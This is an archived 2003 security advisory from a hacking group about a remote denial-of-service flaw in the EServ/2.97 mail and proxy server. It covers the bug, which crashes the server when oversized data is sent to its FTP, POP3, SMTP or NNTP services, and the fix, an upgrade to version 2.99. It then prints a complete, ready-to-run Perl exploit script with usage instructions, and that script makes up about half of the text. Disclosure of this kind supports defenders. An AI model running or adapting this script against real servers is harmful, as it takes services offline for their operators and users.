EServ/2.97 remote DoS

2003-01-05T00:00:00
ID SECURITYVULNS:DOC:3938
Type securityvulns
Reporter Securityvulns
Modified 2003-01-05T00:00:00

Description

###############################################*

Damage Hacking Group security advisory

www.dhgroup.org

###############################################*

Product: EServ/2.97

Authors: Etype Co. [www.eserv.ru]

Vulnerable versions: up to v.2.97, may be 2.98

Not vulnerable versions: v.2.99

Vulnerability: remote DoS

###############################################*

Overview#--------------------------------------------------------------

From EServ's 'readme' file: "Eserv/2.97 - mail, news, web, ftp and proxy server. It includes:

  • SMTP, POP3, NNTP -servers
  • caching HTTP/FTP proxy
  • HTTP server (maintaining virtual servers)
  • FTP server (with download and upload resuming support)
  • FTP-gate
  • Socks5, Socks4 and 4a proxy
  • TCP и UDP mapping proxy
  • Finger-server"

Problem#---------------------------------------------------------------

We founded 4 bugs, that allows to kill EServ by sending data with a very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b, NNTP - 5001216b. This is not buffer overflow, so it's impossible to use this bugs for privelege escalation or something like this.

Fix#--------------------------------------------------------------------

Download new verion from www.eserv.ru. EServ/2.99 is_not_vulnerable.

Exploit#----------------------------------------------------------------

!/usr/bin/perl

EServ/2.97 remote DoS xsploit

Bugs founded in v.2.97 but I think that 2.98 is

vulnerable too.

Usage: perl EServ.DoS.pl [host] [port] [service_type]

Where 'service_type' - service to attack (pop, smtp, ftp, nntp)

Example: perl EServ.DoS.pl localhost 110 pop

If something wrong or u wanna to discuss something,

contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981

use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; $param = $ARGV[2]; $data = "a"; print "\n\n";; print "#Product: EServ/2.97 - www.eserv.ru\n"; print "#Vuln: remote DoS\n"; print "#Xsploit by D4rkGr3y\n"; print "#Warning: if u use dial-up connection, attack can take a few time.\n\n"; if ($param) { $num = "4950001" if $param eq "pop"; $num = "4960000" if $param eq "smtp"; $num = "5005312" if $param eq "ftp"; $num = "5001215" if $param eq "nntp"; die "Error in params\n" if !$num; print "Connecting..."; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket error.\n"; print "OK\n"; $buf .= $data x $num; print "Attacking..."; print $socket "$buf\n"; print "OK\n\n"; print "Vizit us at www.dhgroup.org"; close($socket); } else { print "Error in Params.\n"; print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n"; print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n"; print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n"; exit; }

EOF

Best regards www.dhgroup.org D4rkGr3y icq 540981